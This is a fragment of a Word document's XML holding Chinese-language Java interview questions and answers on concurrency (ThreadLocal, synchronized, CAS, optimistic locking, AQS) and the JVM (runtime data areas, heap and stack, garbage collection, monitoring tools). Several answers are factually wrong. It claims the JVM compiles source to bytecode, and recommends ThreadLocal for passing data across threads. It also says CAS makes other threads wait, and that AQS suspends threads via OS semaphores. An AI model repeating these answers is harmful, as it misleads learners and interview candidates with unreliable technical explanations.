    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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在一些框架中，如 Spring 中，通过 ThreadLocal 来维护一些上下文信息，例如当前用户、请求参数等，方便在不同的方法中进行访问。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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在一些需要跨线程传递数据的场景下，例如计时器、跟踪分析等，可以使用 ThreadLocal 来保证线程安全。</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说一说自己对于 synchronized 关键字的了解？</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如何在项目中使用 synchronized 的？</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说说 JDK1.6 之后的 synchronized 关键字底层做了哪些优化，可以详细介绍一下这些优化吗？</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 synchronized 和 ReenTrantLock 的区别？</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synchronized 和 volatile 的区别是什么？</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谈一下你对 volatile 关键字的理解？</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说下对 ReentrantReadWriteLock 的理解？</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说下对悲观锁和乐观锁的理解？</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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乐观锁常见的两种实现方式是什么？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乐观锁是一种常见的并发控制策略，常见的两种实现方式分别是版本号和CAS。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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版本号</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在实体对象中添加一个版本号属性，每次更新实体对象时将版本号加 1，这样每次更新时都会比对版本号是否一致，如果不一致，则表示数据已经被其他线程修改，此时需要进行相应的处理，比如抛出异常或者重试。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2.CAS</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CAS（Compare and Swap）是一种原子性操作，它可以保证同时只有一个线程修改共享变量，其他线程只有等待。在 Java 中，Atomic包中的类就是基于 CAS 实现的。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实现 CAS 通常需要三个操作数：内存值 V、预期值 A 和新值 B。当且仅当 V 的值等于 A 时，才会将 V 的值设置为 B，否则不会执行任何操作。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乐观锁的优点是并发性能高，缺点是需要处理冲突，增加了编码复杂度</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12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乐观锁的缺点有哪些？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乐观锁虽然可以在一定程度上提高并发性能，但也存在一些缺点，主要包括以下几个方面：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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重试代价较高：由于乐观锁需要不断尝试提交操作，因此在并发冲突较为严重的情况下，可能需要进行多次重试才能成功提交，这会导致重试的代价较高，降低了系统的吞吐量和性能。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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可能导致更新丢失：在并发情况下，多个线程可能会同时读取同一份数据，并进行修改。如果多个线程同时执行 CAS 操作，只有一个线程能够成功，其他线程则需要进行重试。如果重试的次数太多，可能会导致某些线程长时间无法提交修改，从而使得这些线程的修改丢失。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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需要支持 CAS 操作：乐观锁的实现需要依赖底层的硬件支持，即需要底层硬件提供原子性 CAS 操作。因此，在某些不支持 CAS 操作的平台上，乐观锁的实现可能会存在问题。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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可能会影响系统的可伸缩性：在高并发的情况下，乐观锁的重试机制可能会导致大量的线程同时进行重试，从而增加了系统的负载，影响了系统的可伸缩性。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综上所述，乐观锁虽然可以提高系统的并发性能，但也存在一些缺点。在实际应用中，需要根据实际情况综合考虑，选择合适的锁机制，以达到最优的性能和可伸缩性。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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CAS 和 synchronized 的使用场景？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CAS (Compare And Swap) 和 synchronized 都是 Java 中用于实现线程同步的机制，但它们的使用场景略有不同。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CAS 是一种无锁的线程安全机制，利用 CPU 提供的原子性指令实现数据的原子操作，当线程尝试去更新一个共享变量时，CAS 会比较当前共享变量的值和线程希望更新的值是否一致，如果一致，则执行更新操作，否则不断重试。CAS 的优点是实现简单，执行效率高，适用于竞争不激烈、冲突少的场景。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synchronized 是 Java 中的关键字，提供了一种内置的、互斥的线程同步机制，用于保证共享资源的访问同步、有序和可见性。synchronized 的使用场景是在竞争激烈、冲突频繁的场景中，通过加锁的方式来实现线程间的同步，确保同一时刻只有一个线程访问共享资源。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综上所述，CAS 适用于并发冲突不激烈、竞争不频繁的场景，而 synchronized 更适用于并发冲突激烈、竞争频繁的场景。当然，在实际应用中，两者的使用也可以结合起来，充分发挥它们各自的优点</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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简单说下对 Java 中的原子类的理解？</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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atomic 的原理是什么？</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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说下对同步器 AQS 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AQS（AbstractQueuedSynchronizer）是一个抽象的队列同步器，是 Java 并发包中的一个重要组件。它提供了一种通用的框架来实现基于锁和等待/通知机制的同步器，比如 ReentrantLock、CountDownLatch、Semaphore 等。在 AQS 中，一个线程要获取共享资源的访问权，需要首先获得同步状态，如果同步状态已被占用，那么该线程就会进入同步队列等待。</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AQS 的核心是一个 FIFO 的等待队列，当有线程争用同步状态时，它们会被加入到等待队列中。AQS 的实现使用了 CAS（Compare And Swap）算法来实现同步状态的更新，保证了线程安全性。AQS 还提供了一些钩子方法，让子类能够扩展自己的同步逻辑，如 acquire() 和 release() 等方法。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通过 AQS，我们可以很方便地实现各种类型的同步器，支持独占锁和共享锁，可重入锁和非可重入锁，倒计时门闩和信号量等。AQS 提供了一个通用的同步框架，可以帮助我们更方便地实现高效的同步机制。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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AQS 的原理是什么？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QS（AbstractQueuedSynchronizer）是Java并发包中一个用于实现锁、同步器等多线程同步机制的框架。其实现基于一个FIFO队列，被称为等待队列，它用于存放已经获得了锁但是当前无法进行执行的线程。在AQS中，每个线程节点都包含一个状态量，用于表示节点所处的状态（例如，是已经获得了锁还是正在等待中），当线程尝试进行操作时，它会先尝试修改节点的状态，如果修改成功，则表示该线程可以进行操作，否则就需要将该线程加入等待队列，并进行阻塞。</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AQS的原理主要基于两个重要的数据结构，分别是state和WaitQueue。state用于记录当前锁的状态，而WaitQueue用于存放等待队列中的节点。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一个线程尝试获取锁时，如果发现当前锁已经被占用，则会将当前线程封装成一个节点并加入到等待队列中，然后将该线程挂起。当锁释放时，AQS会将等待队列中的第一个节点唤醒，并将其状态设置为可以获取锁的状态，从而完成锁的转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AQS还提供了一些底层操作的接口，如acquire、release等，这些接口可以被具体的锁实现进行调用，从而实现锁的具体功能。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总的来说，AQS的实现原理是通过等待队列和节点状态来实现锁的控制，而节点状态的变化和线程挂起/唤醒则是由操作系统的信号量机制来实现的。</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AQS 对资源的共享模式有哪些？</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AQS 底层使用了模板方法模式，你能说出几个需要重写的方法吗？</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说下对信号量 Semaphore 的理解？</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CountDownLatch 和 CyclicBarrier 有什么区别？</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说下对线程池的理解？为什么要使用线程池？</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创建线程池的参数有哪些？</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如何创建线程池？</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线程池中的的线程数一般怎么设置？需要考虑哪些问题？</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执行 execute() 方法和 submit() 方法的区别是什么呢？</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说下对 Fork和Join 并行计算框架的理解？</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JDK 中提供了哪些并发容器？</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 CopyOnWriteArrayList 的理解？</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 BlockingQueue 的理解？分别有哪些实现类？</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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 ConcurrentSkipListMap 的理解？</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五、Java JVM 42 道</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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说一下 Jvm 的主要组成部分？及其作用？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JVM（Java Virtual Machine，Java虚拟机）是Java程序的运行环境，它负责将Java源代码编译为Java字节码，并在不同的操作系统上提供一致的运行环境。JVM的主要组成部分包括以下几个部分：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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类加载器（ClassLoader）：负责将Java类加载到JVM中。类加载器会根据类的名称查找类文件，并将类文件加载到内存中。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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运行时数据区（Runtime Data Area）：包括方法区、堆、虚拟机栈、本地方法栈和程序计数器等。这些区域用于存储类的结构信息、对象、方法等数据。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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执行引擎（Execution Engine）：负责执行Java字节码。执行引擎包括解释器、即时编译器等。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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本地接口（Native Interface）：用于调用本地方法。本地接口允许Java程序调用使用C、C++等语言编写的库函数。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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Java标准库（Java Standard Library）：是一组Java类库，提供了许多常用的类和方法，包括输入输出、集合、网络、多线程等。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JVM的作用主要包括以下几个方面：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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实现Java程序的跨平台性。Java程序在不同的操作系统上可以运行，这是由于JVM提供了一致的运行环境，将Java字节码翻译成了不同操作系统所能理解的机器码。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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管理Java程序的内存。JVM使用垃圾回收算法管理Java程序的内存，确保Java程序的内存使用是高效和安全的。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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加载和执行Java类。JVM负责将Java类文件加载到内存中，并解释执行Java字节码。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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提供安全性。JVM提供了安全管理机制，可以对Java程序进行安全控制，防止Java程序执行恶意代码或对系统造成损害。</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总之，JVM是Java程序的核心，负责将Java程序编译成机器码并执行。JVM的设计和实现使得Java程序可以跨平台运行，同时也提供了高效、安全的内存管理机制</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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谈谈对运行时数据区的理解？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JVM的运行时数据区（Runtime Data Area）是JVM在运行时用于存储数据的区域，包括以下几个部分：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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方法区（Method Area）：用于存储类的结构信息，如类的方法、字段、常量池等。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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堆（Heap）：用于存储对象实例。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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虚拟机栈（VM Stack）：用于存储方法的局部变量、操作数栈、方法返回值等数据。每个方法在执行时都会创建一个栈帧，存储在虚拟机栈中。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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本地方法栈（Native Method Stack）：用于存储Java程序调用本地方法时的数据。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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程序计数器（Program Counter Register）：用于记录当前线程执行的字节码位置。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在JVM的运行过程中，每个线程都有自己的运行时数据区，各个线程之间的运行时数据区是相互独立的。JVM使用垃圾回收算法管理堆内存，确保Java程序的内存使用是高效和安全的。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VM中，不同的运行时数据区存储的数据类型和作用也不同。方法区主要用于存储类的结构信息，堆用于存储对象实例，虚拟机栈用于存储方法的局部变量、操作数栈、方法返回值等数据。程序计数器用于记录当前线程执行的字节码位置，本地方法栈用于存储Java程序调用本地方法时的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理解JVM的运行时数据区对于Java程序的性能优化和内存管理是非常重要的。在实际开发中，需要根据具体情况调整JVM的内存配置参数，以提高Java程序的性能和稳定性。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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堆和栈的区别是什么？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功能方面：堆是用来存放对象的，栈是用来执行程序的。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共享性：堆是线程共享的，栈是线程私有的。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空间大小：堆大小远远大于栈。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13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堆中存什么？栈中存什么？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在Java中，堆和栈都是用于存储数据的区域，它们存储的数据类型和作用有所不同。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堆（Heap）是Java虚拟机所管理的内存中最大的一块。堆被所有线程共享，用于存储Java程序中创建的对象实例和数组。因为对象实例和数组的大小和生命周期都是不确定的，所以堆的大小也是动态分配的。垃圾回收器在堆中进行垃圾回收，释放不再使用的对象实例和数组占用的空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栈（Stack）是Java虚拟机的一部分，用于存储方法调用的局部变量、方法的参数和方法调用后的返回值等数据。每个线程都有自己的栈空间，用于存储当前线程正在执行的方法的信息。栈空间的大小是固定的，由虚拟机在启动时设置。当方法执行结束时，它的栈帧也会被弹出，释放栈空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堆用于存储动态创建的对象实例和数组，栈用于存储方法调用的局部变量和方法参数。理解堆和栈的区别对于Java程序的性能优化和内存管理非常重要。在实际开发中，需要根据具体情况调整堆和栈的大小，以提高Java程序的性能和稳定性。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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为什么要把堆和栈区分出来呢？栈中不是也可以存储数据吗？</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将堆和栈区分出来主要是出于内存管理的考虑。堆和栈的不同特性和作用，使得它们在存储数据和进行内存管理时有着不同的优缺点。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栈是一种后进先出（LIFO）的数据结构，存储的数据大小是固定的，并且在栈顶进行操作，栈的操作非常高效。因此，栈主要用于存储局部变量和方法调用时的参数和返回值等数据，它们的生命周期很短暂，很快就会被弹出栈帧释放空间，所以不需要进行复杂的内存管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堆是一种动态分配的内存区域，存储的数据大小不固定，并且可以通过指针进行访问。堆的特点是可以在运行时动态创建和销毁对象实例和数组，因此需要进行复杂的内存管理，包括垃圾回收和内存分配等操作。堆和栈的不同特性和作用，使得它们在存储数据和进行内存管理时有着不同的优缺点。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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因此，将堆和栈区分出来有助于Java虚拟机进行更加有效和灵活的内存管理，提高Java程序的性能和稳定性</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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参数传递时传值呢？还是传引用？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在Java中，所有的参数传递都是值传递。这意味着，当将一个参数传递给一个方法时，实际上传递给方法的是该参数值的一个拷贝，而不是参数本身。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对于基本数据类型（如int、float、boolean等），传递的是值本身的拷贝。这意味着，在方法内部对参数值的修改不会影响到原始值。</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对于引用类型（如对象、数组等），传递的是该对象的引用值的拷贝。这意味着，在方法内部对引用所指向的对象进行修改时，会影响到原始对象。但是，如果在方法内部重新赋值给该引用，那么该引用将指向一个新的对象，不会影响到原始对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需要注意的是，Java中并没有“引用传递”的概念。虽然传递的是引用值的拷贝，但这并不等同于传递了引用本身，因为实际上无法直接访问和修改引用值的内存地址。因此，Java中所有的参数传递都是值传递</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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Java 对象的大小是怎么计算的？</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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对象的访问定位的两种方式？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在Java中，对象的访问定位可以通过以下两种方式实现：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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句柄（Handle）方式：Java堆被划分为两部分，一部分为对象实例数据部分，另一部分为对象实例与元数据（如类信息、类型信息等）的指针。Java虚拟机通过句柄访问对象，具体来说，每个对象都有一个句柄，虚拟机根据句柄定位对象，并间接访问对象实例数据和元数据。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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直接指针（直接访问）方式：虚拟机直接使用对象的引用（指针）访问对象，对象的引用指向对象的实例数据和元数据。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句柄方式的优点在于，对象的引用地址可能随时会变化，如果采用直接指针方式，所有引用该对象的地方都需要进行修改。而采用句柄方式，则只需要改变对象句柄中的指针即可，所有引用该对象的地方仍然使用句柄来访问。同时，句柄可以更好地支持垃圾回收，因为对象在移动时只需要改变句柄指针即可，而不需要修改对象实例数据部分的地址。不过，采用句柄方式也会增加额外的访问开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直接指针方式的优点在于，直接访问对象可以减少额外的访问开销，因为不需要先访问句柄再访问对象实例数据和元数据。但是，采用直接指针方式也存在一些问题，比如对象移动时需要修改所有引用该对象的地方。</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判断垃圾可以回收的方法有哪些？</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垃圾回收是从哪里开始的呢？</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被标记为垃圾的对象一定会被回收吗？</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 Java 中引用的了解？</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谈谈对内存泄漏的理解？</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内存泄露的根本原因是什么？</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举几个可能发生内存泄漏的情况？</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尽量避免内存泄漏的方法？</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常用的垃圾收集算法有哪些？</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为什么要采用分代收集算法？</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分代收集下的年轻代和老年代应该采用什么样的垃圾回收算法？</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什么是浮动垃圾？</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什么是内存碎片？如何解决？</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常用的垃圾收集器有哪些？</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CMS 垃圾收集器的理解？</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G1 收集器的理解？</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说下你对垃圾回收策略的理解/垃圾回收时机？</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谈谈你对内存分配的理解？大对象怎么分配？空间分配担保？</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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说下你用过的 JVM 监控工具？</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VisualVM：这是一个开源的JVM监控和分析工具，可以用于监控本地和远程JVM，提供了多种视图和工具，如垃圾回收器、线程、内存和CPU等的监控和分析。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>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rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体" w:cs="黑体"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体" w:cs="黑体"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>·</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体" w:cs="黑体"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体" w:cs="黑体"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:bdr w:val="single" w:color="DDDDDD" w:sz="2" w:space="0"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>JConsole：这是一个JVM监控和管理工具，可以通过JMX（Java Management Extensions）连接到本地或远程JVM，提供了多种视图和工具，如垃圾回收器、线程、内存和CPU等的监控和管理。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>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rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体" w:cs="黑体"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体" w:cs="黑体"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>·</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体" w:cs="黑体"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体" w:cs="黑体"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:bdr w:val="single" w:color="DDDDDD" w:sz="2" w:space="0"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>JVisualVM：这是一个JVM监控和分析工具，类似于VisualVM，可以用于监控本地和远程JVM，提供了多种视图和工具，如垃圾回收器、线程、内存和CPU等的监控和分析。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>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rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体" w:cs="黑体"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体" w:cs="黑体"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>·</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体" w:cs="黑体"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体" w:cs="黑体"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:bdr w:val="single" w:color="DDDDDD" w:sz="2" w:space="0"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>GCViewer：这是一个开源的垃圾回收器日志分析工具，可以用于分析垃圾回收器的输出日志，提供了多种图表和视图，如垃圾回收器的时间、内存和对象等的分析。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>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rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体" w:cs="黑体"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体" w:cs="黑体"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>·</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体" w:cs="黑体"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体" w:cs="黑体"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:bdr w:val="single" w:color="DDDDDD" w:sz="2" w:space="0"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Prometheus+Grafana：这是一组开源的监控和可视化工具，可以用于监控JVM的性能和指标，如CPU、内存、垃圾回收器、线程等，并提供了多种图表和视图，如柱形图、折线图和仪表盘等。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这些工具都是非常有用的JVM监控工具，可以帮助开发人员和运维人员更好地监控和分析JVM的性能和指标，从而提高应用程序的可靠性和性能。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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如何利用监控工具调优？</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
